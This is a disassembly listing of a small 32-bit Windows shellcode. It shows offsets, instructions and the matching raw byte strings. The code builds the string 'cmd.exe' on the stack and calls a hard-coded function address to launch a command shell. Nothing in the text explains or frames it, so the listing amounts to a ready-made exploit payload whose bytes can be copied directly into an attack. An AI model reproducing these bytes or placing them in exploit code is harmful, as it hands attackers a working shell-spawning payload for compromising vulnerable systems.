0x0        mov eax, 0xffffefff                 \xb8\xff\xef\xff\xff      .....     
0x5        not eax                             \xf7\xd0                  ..        
0x7        sub esp, eax                        \x2b\xe0                  +.        
0x9        push ebp                            \x55                      U         
0xa        mov ebp, esp                        \x8b\xec                  ..        
0xc        xor edi, edi                        \x33\xff                  3.        
0xe        push edi                            \x57                      W         
0xf        sub esp, 4                          \x83\xec\x04              ...       
0x12       mov byte ptr [ebp - 8], 0x63        \xc6\x45\xf8\x63          .E.c      
0x16       mov byte ptr [ebp - 7], 0x6d        \xc6\x45\xf9\x6d          .E.m      
0x1a       mov byte ptr [ebp - 6], 0x64        \xc6\x45\xfa\x64          .E.d      
0x1e       mov byte ptr [ebp - 5], 0x2e        \xc6\x45\xfb\x2e          .E..      
0x22       mov byte ptr [ebp - 4], 0x65        \xc6\x45\xfc\x65          .E.e      
0x26       mov byte ptr [ebp - 3], 0x78        \xc6\x45\xfd\x78          .E.x      
0x2a       mov byte ptr [ebp - 2], 0x65        \xc6\x45\xfe\x65          .E.e      
0x2e       lea eax, [ebp - 8]                  \x8d\x45\xf8              .E.       
0x31       push eax                            \x50                      P         
0x32       mov ebx, 0x77bf93c7                 \xbb\xc7\x93\xbf\x77      ....w     
0x37       call ebx                            \xff\xd3                  ..        
